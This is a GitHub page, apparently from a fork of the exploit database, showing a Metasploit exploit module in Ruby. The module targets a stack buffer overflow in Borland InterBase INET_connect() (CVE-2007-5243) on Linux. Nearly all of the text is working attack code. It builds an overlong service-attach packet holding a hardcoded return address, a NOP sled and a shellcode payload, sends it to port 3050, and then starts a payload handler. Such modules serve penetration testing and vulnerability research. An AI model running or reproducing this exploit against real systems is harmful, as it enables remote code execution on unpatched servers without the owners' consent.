forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path10021.rb
More file actions
executable file
·130 lines (98 loc) · 2.32 KB
/
Copy path10021.rb
File metadata and controls
executable file
·130 lines (98 loc) · 2.32 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Borland InterBase INET_connect() Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in Borland InterBase
by sending a specially crafted service attach request.
},
'Version' => '$Revision$',
'Author' =>
[
'ramon',
'Adriano Lima <adriano@risesecurity.org>',
],
'Arch' => ARCH_X86,
'Platform' => 'linux',
'References' =>
[
[ 'CVE', '2007-5243' ],
[ 'OSVDB', '38605' ],
[ 'BID', '25917' ],
[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],
],
'Privileged' => true,
'License' => MSF_LICENSE,
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x00\x2f\x3a\x40\x5c",
},
'Targets' =>
[
# 0x0804d2ee 5b5e5f5dc3
[
'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',
{ 'Ret' => 0x0804d2ee }
],
],
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(3050)
],
self.class
)
end
def exploit
connect
# Attach database
op_attach = 19
# Create database
op_create = 20
# Service attach
op_service_attach = 82
length = 161
remainder = length.remainder(4)
padding = 0
if remainder > 0
padding = (4 - remainder)
end
buf = ''
# Operation/packet type
buf << [op_service_attach].pack('N')
# Id
buf << [0].pack('N')
# Length
buf << [length].pack('N')
# Random alpha data
buf << rand_text_alpha(length - 5)
# Target
buf << [target.ret].pack('L')
# Separator
buf << ':'
# Padding
buf << "\x00" * padding
# Database parameter block
# Length
buf << [1024].pack('N')
# It will return into this nop block
buf << make_nops(1024 - payload.encoded.length)
# Payload
buf << payload.encoded
sock.put(buf)
handler
end
end